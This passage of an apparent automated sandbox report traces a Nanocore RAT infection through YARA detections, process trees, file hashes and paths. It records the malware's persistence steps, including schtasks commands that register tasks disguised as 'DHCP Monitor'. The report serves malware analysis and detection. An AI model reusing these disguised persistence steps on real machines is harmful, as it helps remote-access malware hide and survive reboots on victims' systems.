            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.384746745.00000000042C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.387003815.0000000003526000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.386831922.000000000435E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.384936448.00000000042C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.384792516.000000000432A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.386582858.000000000432A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.384816077.0000000003526000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.385533357.0000000004393000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.386935348.00000000042C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.386760974.000000000435E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000004.00000003.384853009.00000000042F6000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Antivirus matches:
            • Detection: 32%, ReversingLabs
            Reputation:low

            Chronological Activities

            Analysis Process: RegSvcs.exe PID: 4644 Parent PID: 3836

            General

            Start time:12:16:20
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Imagebase:0xdd0000
            File size:45152 bytes
            MD5 hash:2867A3817C9245F7CF518524DFD18F28
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.572913306.000000000489B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.567098678.00000000011A2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.570251514.0000000003861000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.574999029.0000000006440000.00000004.00020000.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.574999029.0000000006440000.00000004.00020000.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.575657153.0000000006FB0000.00000004.00020000.sdmp, Author: Joe Security
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.575569142.0000000006F90000.00000004.00020000.sdmp, Author: Florian Roth
            • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.575569142.0000000006F90000.00000004.00020000.sdmp, Author: Florian Roth
            Antivirus matches:
            • Detection: 0%, Metadefender, Browse
            • Detection: 0%, ReversingLabs
            Reputation:high

            Chronological Activities

            Analysis Process: schtasks.exe PID: 6764 Parent PID: 4644

            General

            Start time:12:16:25
            Start date:13/10/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp8F04.tmp'
            Imagebase:0xff0000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: conhost.exe PID: 4336 Parent PID: 6764

            General

            Start time:12:16:25
            Start date:13/10/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7f20f0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: schtasks.exe PID: 2352 Parent PID: 4644

            General

            Start time:12:16:26
            Start date:13/10/2021
            Path:C:\Windows\SysWOW64\schtasks.exe
            Wow64 process (32bit):true
            Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp94A3.tmp'
            Imagebase:0xff0000
            File size:185856 bytes
            MD5 hash:15FF7D8324231381BAD48A052F85DF04
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: RegSvcs.exe PID: 2148 Parent PID: 664

            General

            Start time:12:16:26
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
            Imagebase:0x6f0000
            File size:45152 bytes
            MD5 hash:2867A3817C9245F7CF518524DFD18F28
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Reputation:high

            Chronological Activities

            Analysis Process: conhost.exe PID: 4868 Parent PID: 2352

            General

            Start time:12:16:27
            Start date:13/10/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7f20f0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: conhost.exe PID: 6892 Parent PID: 2148

            General

            Start time:12:16:27
            Start date:13/10/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7f20f0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Chronological Activities

            Analysis Process: bspmflqee.pif PID: 1048 Parent PID: 3352

            General

            Start time:12:16:27
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
            Imagebase:0xf90000
            File size:777456 bytes
            MD5 hash:8E699954F6B5D64683412CC560938507
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.423204049.0000000004A4A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.421938786.0000000004AB4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.421415700.0000000004A7F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.423042439.0000000004AE8000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.423278623.0000000004AB3000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.423077125.0000000004A7F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.421689539.0000000004A4A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.422088669.0000000004AE8000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.422141219.0000000004B1C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.421763189.0000000004A16000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.423525061.00000000049E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.420907021.0000000004A16000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.421847119.0000000004A7F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.422029126.0000000004AB4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.423356287.0000000004A16000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.421567836.00000000049E1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            Reputation:low

            Chronological Activities

            Analysis Process: dhcpmon.exe PID: 5076 Parent PID: 664

            General

            Start time:12:16:30
            Start date:13/10/2021
            Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            Wow64 process (32bit):true
            Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
            Imagebase:0x940000
            File size:45152 bytes
            MD5 hash:2867A3817C9245F7CF518524DFD18F28
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Antivirus matches:
            • Detection: 0%, Metadefender, Browse
            • Detection: 0%, ReversingLabs
            Reputation:high

            Chronological Activities

            Analysis Process: conhost.exe PID: 5096 Parent PID: 5076

            General

            Start time:12:16:31
            Start date:13/10/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7f20f0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language

            Chronological Activities

            Analysis Process: wscript.exe PID: 7032 Parent PID: 3352

            General

            Start time:12:16:35
            Start date:13/10/2021
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\98025414\Update.vbs'
            Imagebase:0x7ff6d16a0000
            File size:163840 bytes
            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Chronological Activities

            Analysis Process: RegSvcs.exe PID: 3560 Parent PID: 1048

            General

            Start time:12:16:37
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
            Imagebase:0x100000
            File size:45152 bytes
            MD5 hash:2867A3817C9245F7CF518524DFD18F28
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.450398182.0000000003B99000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.450263245.0000000002B91000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.446552957.0000000000502000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

            Chronological Activities

            Analysis Process: dhcpmon.exe PID: 1504 Parent PID: 3352

            General

            Start time:12:16:44
            Start date:13/10/2021
            Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
            Wow64 process (32bit):true
            Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
            Imagebase:0x720000
            File size:45152 bytes
            MD5 hash:2867A3817C9245F7CF518524DFD18F28
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:.Net C# or VB.NET

            Chronological Activities

            Analysis Process: conhost.exe PID: 1376 Parent PID: 1504

            General

            Start time:12:16:44
            Start date:13/10/2021
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7f20f0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language

            Chronological Activities

            Analysis Process: bspmflqee.pif PID: 3032 Parent PID: 3352

            General

            Start time:12:16:52
            Start date:13/10/2021
            Path:C:\Users\user\AppData\Roaming\98025414\bspmflqee.pif
            Wow64 process (32bit):true
            Commandline:'C:\Users\user\AppData\Roaming\98025414\BSPMFL~1.PIF' C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
            Imagebase:0xf90000
            File size:777456 bytes
            MD5 hash:8E699954F6B5D64683412CC560938507
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.471749969.0000000003E23000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.468945390.0000000003DEF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.469891641.0000000003E8C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.469212700.0000000003E24000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.472098835.0000000003D51000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.469336157.0000000003E24000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.471685199.0000000003DBA000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.467883620.0000000003D86000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, Author: Joe Security
            • Rule: NanoCore, Description: unknown, Source: 00000016.00000003.468798612.0000000003D86000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
            • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, Author: Florian Roth
            • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000003.468698040.0000000003DBA000.00000004.00000001.sdmp, Author: Joe Security
